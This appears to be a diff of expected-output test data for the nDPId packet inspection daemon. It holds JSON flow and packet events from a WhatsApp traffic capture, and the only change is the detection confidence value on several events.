00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1655097851208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655097851208,"pkt":"eJS0JASgYDjgxTWgCABFAAA8hVJAAD8GfO\/AqAJkszzDMbj2FGbdMghiAAAAAKAC\/\/9ZggAAAgQFtAQCCAo4P8nQAAAAAAEDAwk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1655097851243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655097851243,"pkt":"eJS0JASgYDjgxTWgCABFAAA0hVNAAD8GfPbAqAJkszzDMbj2FGbdMghj2gcbf4AQAIDKFgAAAQEICjg\/yfKnyyA1"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1655097851444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655097851444,"pkt":"eJS0JASgYDjgxTWgCABFAAA4hVRAAD8GfPHAqAJkszzDMbj2FGbdMghj2gcbf4AYAICEGAAAAQEICjg\/yp+nyyA1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655097851208,"flow_last_seen":1655097851476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655097851476,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655090233457,"flow_last_seen":1655090233805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655089030478,"flow_last_seen":1655089030857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655097851208,"flow_last_seen":1655097851476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655097851476,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655090233457,"flow_last_seen":1655090233805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655089030478,"flow_last_seen":1655089030857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655097851805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":505,"packets-processed":504,"total-skipped-flows":0,"total-l4-payload-len":39806,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":64,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":64,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":429,"global_ts_msec":1655099328045} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655099328045,"flow_last_seen":1655099328045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655099328045,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1655099328045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655099328045,"pkt":"eJS0JASgYDjgxTWgCABFAAA8L\/pAAD8G0kfAqAJkszzDMcBWFGYVxjf+AAAAAKAC\/\/\/UVQAAAgQFtAQCCApxjaYfAAAAAAEDAwk="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1655099328158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655099328158,"pkt":"eJS0JASgYDjgxTWgCABFAAA0L\/tAAD8G0k7AqAJkszzDMcBWFGYVxjf\/2SNcwIAQAIBe7wAAAQEICnGNpo+IgeTO"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1655099328163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655099328163,"pkt":"eJS0JASgYDjgxTWgCABFAAA4L\/xAAD8G0knAqAJkszzDMcBWFGYVxjf\/2SNcwIAYAIAZmQAAAQEICnGNppSIgeTORUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655099328045,"flow_last_seen":1655099328197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655099328197,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655091294583,"flow_last_seen":1655091295192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655099328610,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655099328045,"flow_last_seen":1655099328197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655099328197,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655091294583,"flow_last_seen":1655091295192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655099328610,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":513,"packets-processed":512,"total-skipped-flows":0,"total-l4-payload-len":40128,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":65,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":65,"total-idle-flows":62,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":436,"global_ts_msec":1655100445438} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655100445438,"flow_last_seen":1655100445438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655100445438,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1655100445438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655100445438,"pkt":"eJS0JASgYDjgxTWgCABFAAA8dbNAAD8GjI7AqAJkszzDMcBiFGbUEWBGAAAAAKAC\/\/9\/mgAAAgQFtAQCCApxjhQ6AAAAAAEDAwk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1655100445526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655100445526,"pkt":"eJS0JASgYDjgxTWgCABFAAA0dbRAAD8GjJXAqAJkszzDMcBiFGbUEWBH1mTBCIAQAIABwwAAAQEICnGOFJasjGe\/"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1655100445560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655100445560,"pkt":"eJS0JASgYDjgxTWgCABFAAA4dbVAAD8GjJDAqAJkszzDMcBiFGbUEWBH1mTBCIAYAIC8UQAAAQEICnGOFLasjGe\/RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655100445438,"flow_last_seen":1655100445594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655100445594,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655100445438,"flow_last_seen":1655100445594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655100445594,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":521,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":521,"packets-processed":520,"total-skipped-flows":0,"total-l4-payload-len":40413,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":66,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":66,"total-idle-flows":62,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":442,"global_ts_msec":1655101503188} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655101503188,"flow_last_seen":1655101503188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655101503188,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1655101503188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655101503188,"pkt":"eJS0JASgYDjgxTWgCABFAAA8uEdAAD8GSfrAqAJkszzDMbjAFGZ59kNkAAAAAKAC\/\/+x6gAAAgQFtAQCCArH7AorAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1655101503221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655101503221,"pkt":"eJS0JASgYDjgxTWgCABFAAA0uEhAAD8GSgHAqAJkszzDMbjAFGZ59kNlF+8VdoAQAKz2ngAAAQEICsfsCkuDiThP"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1655101503234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655101503234,"pkt":"eJS0JASgYDjgxTWgCABFAAA4uElAAD8GSfzAqAJkszzDMbjAFGZ59kNlF+8VdoAYAKyxQAAAAQEICsfsCliDiThPRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655101503188,"flow_last_seen":1655101503267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655101503267,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655101503188,"flow_last_seen":1655101503267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655101503267,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47296,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":529,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":529,"packets-processed":528,"total-skipped-flows":0,"total-l4-payload-len":40736,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":67,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":67,"total-idle-flows":62,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":448,"global_ts_msec":1655104186658} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655104186658,"flow_last_seen":1655104186658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655104186658,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1655104186658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655104186658,"pkt":"eJS0JASgYDjgxTWgCABFAAA8z9lAAD8GMmjAqAJkszzDMbscFGbxjY\/TAAAAAKAC\/\/\/9wgAAAgQFtAQCCAo4WoeCAAAAAAEDAwk="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1655104186714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655104186714,"pkt":"eJS0JASgYDjgxTWgCABFAAA0z9pAAD8GMm\/AqAJkszzDMbscFGbxjY\/UkjD8dIAQAIBW5gAAAQEICjhah\/LAS4W5"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1655104186877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655104186877,"pkt":"eJS0JASgYDjgxTWgCABFAAA4z9tAAD8GMmrAqAJkszzDMbscFGbxjY\/UkjD8dIAYAIARCwAAAQEICjhaiHzAS4W5RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655104186658,"flow_last_seen":1655104186938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655104186938,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655096063383,"flow_last_seen":1655096063826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655104187274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655104186658,"flow_last_seen":1655104186938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655104186938,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47900,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655096063383,"flow_last_seen":1655096063826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655104187274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":537,"packets-processed":536,"total-skipped-flows":0,"total-l4-payload-len":41070,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":68,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":68,"total-idle-flows":63,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":455,"global_ts_msec":1655105188559} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655105188559,"flow_last_seen":1655105188559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655105188559,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1655105188559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655105188559,"pkt":"eJS0JASgYDjgxTWgCABFAAA8S7JAAD8Gto\/AqAJkszzDMbnmFGYb9oTUAAAAAKAC\/\/+DSwAAAgQFtAQCCArH\/lQiAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1655105188592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655105188592,"pkt":"eJS0JASgYDjgxTWgCABFAAA0S7NAAD8GtpbAqAJkszzDMbnmFGYb9oTVXDwEToAQAKxqDAAAAQEICsf+VEPB4STE"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1655105188604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655105188604,"pkt":"eJS0JASgYDjgxTWgCABFAAA4S7RAAD8GtpHAqAJkszzDMbnmFGYb9oTVXDwEToAYAKwkrwAAAQEICsf+VE\/B4STERUQAAQ=="} 